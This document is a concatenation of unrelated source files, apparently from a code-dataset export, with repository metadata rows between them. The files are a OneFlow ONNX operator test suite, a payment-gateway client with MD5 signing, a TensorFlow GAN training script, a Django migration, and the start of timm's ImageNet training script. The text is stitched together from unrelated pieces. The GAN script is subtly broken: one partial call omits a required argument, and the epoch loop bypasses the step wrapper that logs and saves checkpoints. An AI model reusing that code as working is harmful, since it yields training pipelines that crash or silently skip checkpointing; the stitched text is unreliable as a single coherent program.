you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import oneflow as flow
from util import convert_to_onnx_and_check
# Shared OneFlow job configuration: every test job defaults to float32.
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
def generate_binary_op_test(flow_op, *args, opset=None, **kwargs):
    """Check ONNX round-trip for a binary OneFlow op.

    Builds a job applying `flow_op` to two random float variables with
    broadcasting shapes (2, 3, 4) and (1, 3, 1), then exports it to ONNX and
    verifies the outputs match.  Extra *args/**kwargs are forwarded to the op;
    `opset` selects the ONNX opset for the export check.
    """
    @flow.global_function(func_config)
    def job1():
        # Values drawn uniformly from [-10, 10].
        x = flow.get_variable(
            name="x1",
            shape=(2, 3, 4),
            dtype=flow.float,
            initializer=flow.random_uniform_initializer(-10, 10),
        )
        y = flow.get_variable(
            name="y1",
            shape=(1, 3, 1),
            dtype=flow.float,
            initializer=flow.random_uniform_initializer(-10, 10),
        )
        return flow_op(x, y, *args, **kwargs)
    convert_to_onnx_and_check(job1, opset=opset)
def generate_unary_op_test(
    flow_op, *args, opset=None, min_val=-10, max_val=10, **kwargs
):
    """Check ONNX round-trip for a unary OneFlow op.

    Builds a job applying `flow_op` to one random float variable of shape
    (2, 3, 4) with values drawn uniformly from [min_val, max_val] (useful to
    keep inputs inside the op's domain, e.g. [-1, 1] for asin), then exports
    it to ONNX and verifies the outputs match.
    """
    @flow.global_function(func_config)
    def job1():
        x = flow.get_variable(
            name="x1",
            shape=(2, 3, 4),
            dtype=flow.float,
            initializer=flow.random_uniform_initializer(min_val, max_val),
        )
        return flow_op(x, *args, **kwargs)
    convert_to_onnx_and_check(job1, opset=opset)
# ---- Elementwise binary ops (broadcast (2, 3, 4) against (1, 3, 1)) ----
def test_mul(test_case):
    generate_binary_op_test(flow.math.multiply)
def test_div(test_case):
    generate_binary_op_test(flow.math.divide)
def test_sub(test_case):
    generate_binary_op_test(flow.math.subtract)
def test_add(test_case):
    generate_binary_op_test(flow.math.add)
# ---- Elementwise unary ops; min_val/max_val restrict inputs to the op's domain ----
def test_abs(test_case):
    generate_unary_op_test(flow.math.abs)
def test_ceil(test_case):
    generate_unary_op_test(flow.math.ceil)
def test_acos(test_case):
    generate_unary_op_test(flow.math.acos, min_val=-1, max_val=1)
def test_asin(test_case):
    generate_unary_op_test(flow.math.asin, min_val=-1, max_val=1)
def test_atan(test_case):
    generate_unary_op_test(flow.math.atan, min_val=-1, max_val=1)
def test_acosh(test_case):
    generate_unary_op_test(flow.math.acosh, min_val=1, max_val=100)
def test_asinh(test_case):
    generate_unary_op_test(flow.math.asinh, min_val=-1, max_val=1)
def test_atanh(test_case):
    generate_unary_op_test(flow.math.atanh, min_val=-1, max_val=1)
def test_sin(test_case):
    generate_unary_op_test(flow.math.sin)
def test_cos(test_case):
    generate_unary_op_test(flow.math.cos)
def test_tan(test_case):
    generate_unary_op_test(flow.math.tan)
def test_sinh(test_case):
    generate_unary_op_test(flow.math.sinh)
def test_cosh(test_case):
    generate_unary_op_test(flow.math.cosh)
def test_tanh_v2(test_case):
    generate_unary_op_test(flow.math.tanh_v2)
def test_tanh(test_case):
    generate_unary_op_test(flow.math.tanh)
def test_erf(test_case):
    generate_unary_op_test(flow.math.erf)
def test_log(test_case):
    generate_unary_op_test(flow.math.log, min_val=0, max_val=100)
def test_floor(test_case):
    generate_unary_op_test(flow.math.floor)
def test_reciprocal(test_case):
    generate_unary_op_test(flow.math.reciprocal)
def test_round(test_case):
    # Round requires ONNX opset 11.
    generate_unary_op_test(flow.math.round, opset=11)
def test_rsqrt(test_case):
    generate_unary_op_test(flow.math.rsqrt, min_val=0, max_val=100)
def test_sigmoid_v2(test_case):
    generate_unary_op_test(flow.math.sigmoid_v2)
def test_sigmoid(test_case):
    generate_unary_op_test(flow.math.sigmoid)
def test_sign(test_case):
    generate_unary_op_test(flow.math.sign)
def test_softplus(test_case):
    generate_unary_op_test(flow.math.softplus)
# NOTE(review): duplicate definition -- identical to test_sigmoid above; the
# later def shadows the earlier one, so pytest collects it only once.
def test_sigmoid(test_case):
    generate_unary_op_test(flow.math.sigmoid)
def test_sqrt(test_case):
    generate_unary_op_test(flow.math.sqrt, min_val=0, max_val=100)
# NOTE(review): "sqaure" is a typo for "square"; renaming would change the
# collected test id, so it is left as-is.
def test_sqaure(test_case):
    generate_unary_op_test(flow.math.square)
def test_maximum(test_case):
    generate_binary_op_test(flow.math.maximum)
def test_minimum(test_case):
    generate_binary_op_test(flow.math.minimum)
# ---- Comparison ops (Equal/NotEqual require opset 11) ----
def test_equal(test_case):
    generate_binary_op_test(flow.math.equal, opset=11)
def test_not_equal(test_case):
    generate_binary_op_test(flow.math.not_equal, opset=11)
def test_less(test_case):
    generate_binary_op_test(flow.math.less)
def test_greater(test_case):
    generate_binary_op_test(flow.math.greater)
def test_less_equal(test_case):
    generate_binary_op_test(flow.math.less_equal)
def test_greater_equal(test_case):
    generate_binary_op_test(flow.math.greater_equal)
def test_squared_difference(test_case):
    generate_binary_op_test(flow.math.squared_difference)
def test_cast(test_case):
    generate_unary_op_test(flow.cast, dtype=flow.int32)
# ---- Scalar variants ("test_cast" below is a typo for "test_case"; the
# parameter is unused, so it is left unchanged) ----
def test_scalar_mul_int(test_cast):
    generate_unary_op_test(flow.math.multiply, 5)
def test_scalar_mul_float(test_cast):
    generate_unary_op_test(flow.math.multiply, 5.1)
def test_scalar_add_int(test_cast):
    generate_unary_op_test(flow.math.add, 5)
def test_scalar_add_float(test_cast):
    generate_unary_op_test(flow.math.add, 5.1)
| 22.830579 | 74 | 0.745339 |
acdf90340477ffed411f44fe5c63f55f1b4e76bd | 2,396 | py | Python | service/util/pay/yunmq/ymq.py | mutouxia/kamiFaka | d5750de11de86f7a961ada4c11dd9f7ccaa38f12 | [
"MIT"
] | 717 | 2020-10-18T05:24:17.000Z | 2022-03-30T11:47:16.000Z | service/util/pay/yunmq/ymq.py | mutouxia/kamiFaka | d5750de11de86f7a961ada4c11dd9f7ccaa38f12 | [
"MIT"
] | 42 | 2020-10-22T15:37:22.000Z | 2022-02-27T04:52:27.000Z | service/util/pay/yunmq/ymq.py | mutouxia/kamiFaka | d5750de11de86f7a961ada4c11dd9f7ccaa38f12 | [
"MIT"
] | 267 | 2020-10-26T09:04:30.000Z | 2022-03-30T05:52:04.000Z | import requests
import hashlib
from urllib.parse import urlencode,unquote
class Ymq:
    """Client for the yunmianqian.com "Yun Mian Qian" payment gateway.

    Signs requests with an MD5 of the concatenated fields plus the merchant
    key.  The exact concatenation order in create_order()/sign() is part of
    the gateway's signature contract -- do not reorder.
    """
    def __init__(self,payment='wechat'):
        # Lazily imported to avoid a circular import with the config module.
        from service.util.pay.pay_config import get_config
        # config = get_config('随便付')
        self.web_url = get_config('web_url')
        if payment == 'wechat':
            config = get_config('云免签微信')
        else:
            config = get_config('云免签支付宝')
        self.payment = payment
        self.app_id = config['APP_ID'] # merchant id
        self.key = config['KEY']
        self.API = 'https://open.yunmianqian.com/api/'
        self.headers = {'content-type': 'application/x-www-form-urlencoded'}
    def create_order(self,name,out_trade_no,total_price):
        """Create a payment order; returns a QR-code payload dict or False on failure."""
        data = {
            'app_id' : self.app_id, # merchant id
            'out_order_sn' : out_trade_no, # our order number
            'name' : name, # order title (gateway: 1 = redirect, 2 = json -- TODO confirm this comment's placement)
            'pay_way' : self.payment, # personal payment QR channel
            'price' : int(total_price*100), # amount, in cents (fen)
            'attach' :'kmfaka',
            'notify_url':self.web_url + '/notify/ymq',
        }
        # MD5 over the concatenated field values + merchant key (gateway signature scheme).
        data['sign'] = hashlib.md5((data['app_id']+str(data['out_order_sn'])+str(data['name'])+str(data['pay_way']+str(data['price'])+str(data['attach'])+str(data['notify_url'])+self.key)).encode('utf8')).hexdigest()
        # print(urlencode(order))
        r = requests.post(self.API+'pay',data=data,headers=self.headers)
        if r.status_code == 200:
            if r.json()['code'] == 200:
                res = r.json()['data']
                # reallyPrice is converted back from cents to the currency unit.
                return {'qr_code':res['qr'],'payjs_order_id':res['out_order_sn'],'reallyPrice':res['pay_price']/100,'redirect':2}
        return False
    def sign(self,data):
        """Compute the notify-callback signature; None if any field is missing.

        NOTE(review): the bare except silently maps every error (missing key,
        type error) to None, which verify() then treats as a mismatch.
        """
        try:
            return hashlib.md5((data['app_id']+str(data['order_sn'])+str(data['out_order_sn'])+str(data['notify_count'])+str(data['pay_way']+str(data['price'])+str(data['qr_type'])+str(data['qr_price'])+str(data['pay_price'])+str(data['created_at'])+str(data['paid_at'])+str(data['attach'])+str(data['server_time'])+self.key)).encode('utf8')).hexdigest()
        except:
            return None
    def verify(self,data): # async notify callback; here data = request.form
        """Return True iff the callback's 'sign' matches our recomputed signature.

        NOTE(review): data.pop('sign') mutates the caller's mapping; if data is
        an immutable form dict, pop raises and this returns False -- confirm
        that callers pass a plain mutable dict.
        """
        try:
            signature = data['sign']
            data.pop('sign')
            return signature == self.sign(data) # result is a boolean
        except Exception as e:
            print(e)
            return False
# payjs = Payjs() | 43.563636 | 354 | 0.570117 |
acdf926928e7bf73f9551aa896bcab7d113b4f47 | 10,974 | py | Python | src/models/train_gan.py | ryanhausen/tensorflow_gan_setup | d599b324cdcabfe4aedc0e460a46df792717037e | [
"MIT"
] | null | null | null | src/models/train_gan.py | ryanhausen/tensorflow_gan_setup | d599b324cdcabfe4aedc0e460a46df792717037e | [
"MIT"
] | null | null | null | src/models/train_gan.py | ryanhausen/tensorflow_gan_setup | d599b324cdcabfe4aedc0e460a46df792717037e | [
"MIT"
] | null | null | null | # MIT License
# Copyright 2020 Ryan Hausen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# ofthis software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import os
import time
from functools import partial
from itertools import starmap
from multiprocessing import Pool
from typing import Callable, Dict, Iterator, List, Tuple, Union
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from astropy.io import fits
from tqdm import tqdm
import comet_ml
import gin
import gin.tf
import src.models.comet_utils as comet_utils
import src.models.tf_checkpoint_utils as tf_checkpoint_utils
TensorLike = Union[np.ndarray, tf.Tensor]

# ==============================================================================
# Special functions that need to be implemented in the files that get imported
# ==============================================================================

# BUG FIX: this alias was `Callable[None, [...]]`, which raises
# "TypeError: Callable[args, result]: args must be a list" at import time,
# and the four result values form a tuple, not a list of alternatives.
# A DatasetFunc takes no arguments and returns
# (train iterator, train batch count, test iterator, test batch count).
DatasetFunc = Callable[
    [],
    Tuple[
        Iterator[Union[TensorLike, List[TensorLike]]],  # Training data
        int,  # number of training batches
        Iterator[Union[TensorLike, List[TensorLike]]],  # Test data
        int,  # number of testing batches
    ],
]
LossFunc = Callable[
    [
        Union[TensorLike, List[TensorLike]],  # Data
        Union[TensorLike, List[TensorLike]],  # Generator out
        Union[TensorLike, List[TensorLike]],  # Discriminator out real
        Union[TensorLike, List[TensorLike]],  # Discriminator out fake
    ],
    Union[float, tf.float32],  # Loss to optimize
]
# The metric function takes the output from a training step and returns a
# dictionary of metrics where the key is the name of the metric and the
# the value is a Tuple, the first value is a string from one of three options
# ["float", "figure", "image"], the second value is the metric to be recorded
# which depending on the indicated type, will be recorded by comet.ml an
# example of a MetricFuncResult with a single entry could be the following:
# { "accuracy": ("float", 0.85)}
MetricFuncResult = Dict[str, Tuple[str, Union[float, plt.Figure, np.ndarray]]]
MetricFunc = Callable[
    [
        float,  # epoch completion [0, 1.0]
        Union[TensorLike, List[TensorLike]],  # Data
        Union[TensorLike, List[TensorLike]],  # Generator out
        Union[TensorLike, List[TensorLike]],  # Discriminator out real
        Union[TensorLike, List[TensorLike]],  # Discriminator out fake
    ],
    MetricFuncResult,
]
# ==============================================================================
def gan_training_func(
dataset_func: Callable,
generator: tf.keras.models.Model,
discriminator: tf.keras.models.Model,
generator_optimizer: tf.keras.optimizers.Optimizer,
discriminator_optimizer: tf.keras.optimizers.Optimizer,
generator_loss: LossFunc,
discriminator_loss: LossFunc,
train_metric_function: MetricFunc,
test_metric_function: MetricFunc,
checkpoint_dir: str,
max_checkpoints_to_keep: int,
epochs: int,
log_metric_batch_idx: int,
model_code_file: str,
comet_project_name: str,
comet_disabled: bool,
comet_experiment_key: str,
) -> None:
pass
experiment = comet_utils.setup_experiment(
comet_experiment_key,
comet_project_name,
config_str_to_dict(gin.config_str()),
model_code_file,
comet_disabled,
)
training_step = tf.Variable(0)
checkpoint_manager = tf_checkpoint_utils.setup_checkpoint_and_restore(
generator,
discriminator,
generator_optimizer,
discriminator_optimizer,
training_step,
checkpoint_dir,
experiment.get_key(),
max_checkpoints_to_keep,
)
(
training_data,
train_steps_per_epoch,
testing_data,
test_steps_per_epoch,
) = dataset_func()
train_step_f = partial(
_train_step_f,
generator,
discriminator,
generator_optimizer,
discriminator_optimizer,
generator_loss,
discriminator_loss
)
train_step = partial(
_step,
training_step,
train_step_f,
checkpoint_manager.save,
lambda batch_idx: batch_idx % log_metric_batch_idx == 0,
partial(
comet_utils.get_async_metric_logging_f,
experiment,
experiment.train,
),
train_metric_function,
train_steps_per_epoch,
)
test_step_f = partial(
_test_step_f,
generator,
discriminator,
)
test_step = partial(
_step,
training_step,
test_step_f,
lambda x: None,
lambda batch_idx: True,
partial(
comet_utils.get_async_metric_logging_f,
experiment,
experiment.test,
),
test_metric_function,
test_steps_per_epoch,
)
epoch_f = partial(
_epoch_f,
training_data,
train_steps_per_epoch,
train_step_f,
testing_data,
test_steps_per_epoch,
test_step_f
)
for _ in map(epoch_f, range(epochs)):
pass
def _train_step_f(
    training_step: tf.Variable,
    generator: tf.keras.models.Model,
    discriminator: tf.keras.models.Model,
    generator_optimizer: tf.keras.optimizers.Optimizer,
    discriminator_optimizer: tf.keras.optimizers.Optimizer,
    generator_loss: LossFunc,
    discriminator_loss: LossFunc,
    data: Union[TensorLike, List[TensorLike]],
) -> Tuple[
    Union[TensorLike, List[TensorLike]],
    Union[TensorLike, List[TensorLike]],
    Union[TensorLike, List[TensorLike]],
]:
    """Run one simultaneous optimization step for generator and discriminator.

    Increments the global `training_step`, computes both losses under separate
    gradient tapes, applies one optimizer update each, and returns the raw
    network outputs for metric computation.
    (Return annotation fixed from a 2-tuple to the actual 3-tuple.)
    """
    training_step.assign_add(1)
    # Forward passes AND loss computation must happen inside the tapes so the
    # gradients can flow back through them.
    with tf.GradientTape() as gen_tape, tf.GradientTape() as dsc_tape:
        generator_out = generator([data], training=True)
        discriminator_out_real = discriminator([data], training=True)
        discriminator_out_fake = discriminator([generator_out], training=True)
        loss_g = generator_loss(
            data, generator_out, discriminator_out_real, discriminator_out_fake
        )
        loss_d = discriminator_loss(
            data, generator_out, discriminator_out_real, discriminator_out_fake
        )
    gen_grads = gen_tape.gradient(loss_g, generator.trainable_variables)
    dsc_grads = dsc_tape.gradient(loss_d, discriminator.trainable_variables)
    generator_optimizer.apply_gradients(zip(gen_grads, generator.trainable_variables))
    discriminator_optimizer.apply_gradients(
        zip(dsc_grads, discriminator.trainable_variables)
    )
    return generator_out, discriminator_out_real, discriminator_out_fake
def _test_step_f(
    generator: tf.keras.models.Model,
    discriminator: tf.keras.models.Model,
    data: Union[TensorLike, List[TensorLike]],
) -> Tuple[Union[TensorLike, List[TensorLike]], Union[TensorLike, List[TensorLike]]]:
    """Run one inference-only step: generator output plus the discriminator's
    scores on the real batch and on the generated batch (in that order)."""
    fake_sample = generator([data])
    real_score = discriminator([data])
    fake_score = discriminator([fake_sample])
    return fake_sample, real_score, fake_score
def _step(
    training_step: tf.Variable,
    step_f: Callable[
        [Union[TensorLike, List[TensorLike]]],
        Tuple[
            Union[TensorLike, List[TensorLike]],
            Union[TensorLike, List[TensorLike]],
            Union[TensorLike, List[TensorLike]],
        ],
    ],
    save_f: Callable[[], None],
    should_log_metric: Callable[[int], bool],
    get_log_result_func: Callable[[float], Callable[[MetricFuncResult], None]],
    metric_f: MetricFunc,
    batches_in_dataset: int,
    batch_idx: int,
    data: Union[TensorLike, List[TensorLike]],
) -> int:
    """Run one batch via `step_f`, optionally log metrics, save, and return batch_idx.

    The returned index lets `_epoch_f` detect the end of an epoch.
    (Annotations fixed: `Callable[None, None]` / `Callable[int, bool]` /
    `Callable[float, ...]` were malformed typing subscripts that raise
    TypeError at import time; callable argument lists must be lists.)
    """
    generator_out, discriminator_out_real, discriminator_out_fake = step_f(data)
    if should_log_metric(batch_idx):
        data_progress = batch_idx / batches_in_dataset
        log_result_f = get_log_result_func(training_step.numpy())
        metric_params = [
            data_progress,
            data,
            generator_out,
            discriminator_out_real,
            discriminator_out_fake,
        ]
        # NOTE(review): `with Pool(1)` calls terminate() on exit, which can
        # kill the async metric task before it runs/its callback fires; a
        # close()/join() (or a long-lived pool) would guarantee delivery at
        # the cost of blocking -- TODO confirm the intended semantics.
        with Pool(1) as p:
            p.apply_async(metric_f, metric_params, callback=log_result_f)
    save_f()
    return batch_idx
def _epoch_f(
    training_data: tf.data.Dataset,
    train_steps_per_epoch: int,
    train_step_f: Callable,
    testing_data: tf.data.Dataset,
    test_steps_per_epoch: int,
    test_step_f: Callable,
    epoch_idx: int
) -> None:
    """Run one full epoch: all training batches, then all test batches.

    `train_step_f`/`test_step_f` are called as f(batch_idx, data) and return
    batch_idx, which signals when the epoch's batch budget is exhausted.
    """
    print("Epoch: ", epoch_idx)
    start_time = time.time()

    # Lazily apply the step function to (1-based index, batch) pairs and pull
    # results through tqdm until the last training batch has been processed.
    completed_train_steps = starmap(train_step_f, enumerate(training_data, start=1))
    for step_idx in tqdm(
        completed_train_steps,
        total=train_steps_per_epoch - 1,
        desc="Training",
        unit="Step",
    ):
        if step_idx == train_steps_per_epoch:
            break

    completed_test_steps = starmap(test_step_f, enumerate(testing_data, start=1))
    for step_idx in tqdm(
        completed_test_steps,
        total=test_steps_per_epoch - 1,
        desc="Testing",
        unit="Step",
    ):
        if step_idx == test_steps_per_epoch:
            break

    print(f"\nEpoch completed in {np.round(time.time()-start_time, 2)} seconds")
def config_str_to_dict(config_str: str) -> Dict[str, str]:
    """Convert a ``gin.config_str()`` dump into a flat dict for comet.ml logging.

    Each non-blank, non-comment line of the form ``key = value`` becomes one
    ``{key: value}`` entry, with both sides whitespace-stripped.

    Fixes over the previous revision: the line was split on EVERY ``=``, so any
    value containing ``=`` (e.g. a quoted string) raised ValueError during the
    dict unpacking; splitting now happens only at the first ``=``.  Blank /
    whitespace-only lines are also skipped instead of crashing.
    """
    entries = {}
    for raw_line in config_str.splitlines():
        line = raw_line.strip()
        # Skip blank lines and gin comments.
        if not line or line.startswith("#"):
            continue
        # Split on the FIRST '=' only so values containing '=' survive intact.
        key, _, value = line.partition("=")
        entries[key.strip()] = value.strip()
    return entries
def main(gin_config_file: str) -> None:
    """Parse the gin configuration file and start training.

    All of gan_training_func's parameters are injected by gin, hence the
    pylint suppression on the call below.
    """
    gin.parse_config_file(gin_config_file)
    gan_training_func() # pylint: disable=no-value-for-parameter
if __name__ == "__main__":
    # CLI entry point: the single positional argument is the gin config path.
    parser = argparse.ArgumentParser(description="Model Trainer")
    parser.add_argument("config", help="Gin config file with model params.")
    args = parser.parse_args()
    main(args.config)
| 31 | 88 | 0.667942 |
acdf93786f95a7945c8913e5d9f8076e4683bcb1 | 2,174 | py | Python | disturbance/migrations/0267_auto_20210711_1208.py | jawaidm/disturbance | 4188e816239b9447a58a987d16dd0f05bc6aad53 | [
"Apache-2.0"
] | null | null | null | disturbance/migrations/0267_auto_20210711_1208.py | jawaidm/disturbance | 4188e816239b9447a58a987d16dd0f05bc6aad53 | [
"Apache-2.0"
] | 16 | 2020-03-11T08:25:46.000Z | 2022-03-02T08:14:40.000Z | disturbance/migrations/0267_auto_20210711_1208.py | jawaidm/disturbance | 4188e816239b9447a58a987d16dd0f05bc6aad53 | [
"Apache-2.0"
] | 9 | 2020-01-30T17:37:38.000Z | 2021-09-30T02:22:24.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-07-11 04:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add site-metadata columns to ``ApiarySiteOnApproval``.

    Adds ten columns; every one is nullable or has a default, so the
    migration can be applied to tables that already contain rows without
    a data backfill.
    """

    dependencies = [
        ('disturbance', '0266_auto_20210708_1640'),
    ]

    operations = [
        # Optional approval-workflow dates.
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='approval_cpc_date',
            field=models.DateField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='approval_minister_date',
            field=models.DateField(blank=True, null=True),
        ),
        # Free-text site descriptors, all capped at 40 chars.
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='batch_no',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='catchment',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='cog',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        # Boolean flag defaults to False for all existing rows.
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='dra_permit',
            field=models.BooleanField(default=False),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='forest_block',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='map_ref',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='roadtrack',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='zone',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
    ]
acdf93c36badf3f33a6c70907a85aaccc01a41a7 | 41,978 | py | Python | train.py | techthiyanes/pytorch-image-models | fd360ac951a179474917f4b2d21db8669bf87f68 | [
"Apache-2.0"
] | 1 | 2021-12-15T01:16:59.000Z | 2021-12-15T01:16:59.000Z | train.py | jonychoi/pytorch-image-models | e4360e6125bb0bb4279785810c8eb33b40af3ebd | [
"Apache-2.0"
] | null | null | null | train.py | jonychoi/pytorch-image-models | e4360e6125bb0bb4279785810c8eb33b40af3ebd | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
""" ImageNet Training Script
This is intended to be a lean and easily modifiable ImageNet training script that reproduces ImageNet
training results with some of the latest networks and training techniques. It favours canonical PyTorch
and standard Python style over trying to be able to 'do it all.' That said, it offers quite a few speed
and training result improvements over the usual PyTorch example scripts. Repurpose as you see fit.
This script was started from an early version of the PyTorch ImageNet example
(https://github.com/pytorch/examples/tree/master/imagenet)
NVIDIA CUDA specific speedups adopted from NVIDIA Apex examples
(https://github.com/NVIDIA/apex/tree/master/examples/imagenet)
Hacked together by / Copyright 2020 Ross Wightman (https://github.com/rwightman)
"""
import argparse
import time
import yaml
import os
import logging
from collections import OrderedDict
from contextlib import suppress
from datetime import datetime
import torch
import torch.nn as nn
import torchvision.utils
from torch.nn.parallel import DistributedDataParallel as NativeDDP
from timm.data import create_dataset, create_loader, resolve_data_config, Mixup, FastCollateMixup, AugMixDataset
from timm.models import create_model, safe_model_name, resume_checkpoint, load_checkpoint,\
convert_splitbn_model, model_parameters
from timm.utils import setup_default_logging, random_seed, set_jit_fuser, ModelEmaV2,\
get_outdir, CheckpointSaver, distribute_bn, update_summary, accuracy, AverageMeter,\
dispatch_clip_grad, reduce_tensor
from timm.loss import JsdCrossEntropy, BinaryCrossEntropy, SoftTargetCrossEntropy, BinaryCrossEntropy,\
LabelSmoothingCrossEntropy
from timm.optim import create_optimizer_v2, optimizer_kwargs
from timm.scheduler import create_scheduler
from timm.utils import ApexScaler, NativeScaler
# Optional NVIDIA Apex support: gates the apex-AMP / ApexDDP / apex-SyncBN
# code paths used later in main().
try:
    from apex import amp
    from apex.parallel import DistributedDataParallel as ApexDDP
    from apex.parallel import convert_syncbn_model
    has_apex = True
except ImportError:
    has_apex = False

# Native torch.cuda.amp only exists on PyTorch >= 1.6; probe rather than
# version-check so the flag reflects what is actually importable.
has_native_amp = False
try:
    if getattr(torch.cuda.amp, 'autocast') is not None:
        has_native_amp = True
except AttributeError:
    pass

# Optional Weights & Biases metric logging.
try:
    import wandb
    has_wandb = True
except ImportError:
    has_wandb = False

# Let cudnn autotune conv algorithms; pays off because input shapes are fixed
# during training.
torch.backends.cudnn.benchmark = True
_logger = logging.getLogger('train')
# The first arg parser parses out only the --config argument, this argument is used to
# load a yaml file containing key-values that override the defaults for the main parser below
config_parser = parser = argparse.ArgumentParser(description='Training Config', add_help=False)
parser.add_argument('-c', '--config', default='', type=str, metavar='FILE',
                    help='YAML config file specifying default arguments')

parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')

# Dataset parameters
group = parser.add_argument_group('Dataset parameters')
# Keep this argument outside of the dataset group because it is positional.
parser.add_argument('data_dir', metavar='DIR',
                    help='path to dataset')
group.add_argument('--dataset', '-d', metavar='NAME', default='',
                   help='dataset type (default: ImageFolder/ImageTar if empty)')
group.add_argument('--train-split', metavar='NAME', default='train',
                   help='dataset train split (default: train)')
group.add_argument('--val-split', metavar='NAME', default='validation',
                   help='dataset validation split (default: validation)')
group.add_argument('--dataset-download', action='store_true', default=False,
                   help='Allow download of dataset for torch/ and tfds/ datasets that support it.')
group.add_argument('--class-map', default='', type=str, metavar='FILENAME',
                   help='path to class to idx mapping file (default: "")')

# Model parameters
group = parser.add_argument_group('Model parameters')
group.add_argument('--model', default='resnet50', type=str, metavar='MODEL',
                   help='Name of model to train (default: "resnet50"')
group.add_argument('--pretrained', action='store_true', default=False,
                   help='Start with pretrained version of specified network (if avail)')
group.add_argument('--initial-checkpoint', default='', type=str, metavar='PATH',
                   help='Initialize model from this checkpoint (default: none)')
group.add_argument('--resume', default='', type=str, metavar='PATH',
                   help='Resume full model and optimizer state from checkpoint (default: none)')
group.add_argument('--no-resume-opt', action='store_true', default=False,
                   help='prevent resume of optimizer state when resuming model')
group.add_argument('--num-classes', type=int, default=None, metavar='N',
                   help='number of label classes (Model default if None)')
group.add_argument('--gp', default=None, type=str, metavar='POOL',
                   help='Global pool type, one of (fast, avg, max, avgmax, avgmaxc). Model default if None.')
group.add_argument('--img-size', type=int, default=None, metavar='N',
                   help='Image patch size (default: None => model default)')
group.add_argument('--input-size', default=None, nargs=3, type=int,
                   metavar='N N N', help='Input all image dimensions (d h w, e.g. --input-size 3 224 224), uses model default if empty')
group.add_argument('--crop-pct', default=None, type=float,
                   metavar='N', help='Input image center crop percent (for validation only)')
group.add_argument('--mean', type=float, nargs='+', default=None, metavar='MEAN',
                   help='Override mean pixel value of dataset')
group.add_argument('--std', type=float, nargs='+', default=None, metavar='STD',
                   help='Override std deviation of dataset')
group.add_argument('--interpolation', default='', type=str, metavar='NAME',
                   help='Image resize interpolation type (overrides model)')
group.add_argument('-b', '--batch-size', type=int, default=128, metavar='N',
                   help='Input batch size for training (default: 128)')
group.add_argument('-vb', '--validation-batch-size', type=int, default=None, metavar='N',
                   help='Validation batch size override (default: None)')
group.add_argument('--channels-last', action='store_true', default=False,
                   help='Use channels_last memory layout')
group.add_argument('--torchscript', dest='torchscript', action='store_true',
                   help='torch.jit.script the full model')
group.add_argument('--fuser', default='', type=str,
                   help="Select jit fuser. One of ('', 'te', 'old', 'nvfuser')")
group.add_argument('--grad-checkpointing', action='store_true', default=False,
                   help='Enable gradient checkpointing through model blocks/stages')

# Optimizer parameters
group = parser.add_argument_group('Optimizer parameters')
group.add_argument('--opt', default='sgd', type=str, metavar='OPTIMIZER',
                   help='Optimizer (default: "sgd"')
group.add_argument('--opt-eps', default=None, type=float, metavar='EPSILON',
                   help='Optimizer Epsilon (default: None, use opt default)')
group.add_argument('--opt-betas', default=None, type=float, nargs='+', metavar='BETA',
                   help='Optimizer Betas (default: None, use opt default)')
group.add_argument('--momentum', type=float, default=0.9, metavar='M',
                   help='Optimizer momentum (default: 0.9)')
group.add_argument('--weight-decay', type=float, default=2e-5,
                   help='weight decay (default: 2e-5)')
group.add_argument('--clip-grad', type=float, default=None, metavar='NORM',
                   help='Clip gradient norm (default: None, no clipping)')
group.add_argument('--clip-mode', type=str, default='norm',
                   help='Gradient clipping mode. One of ("norm", "value", "agc")')
group.add_argument('--layer-decay', type=float, default=None,
                   help='layer-wise learning rate decay (default: None)')

# Learning rate schedule parameters
group = parser.add_argument_group('Learning rate schedule parameters')
group.add_argument('--sched', default='cosine', type=str, metavar='SCHEDULER',
                   help='LR scheduler (default: "step"')
group.add_argument('--lr', type=float, default=0.05, metavar='LR',
                   help='learning rate (default: 0.05)')
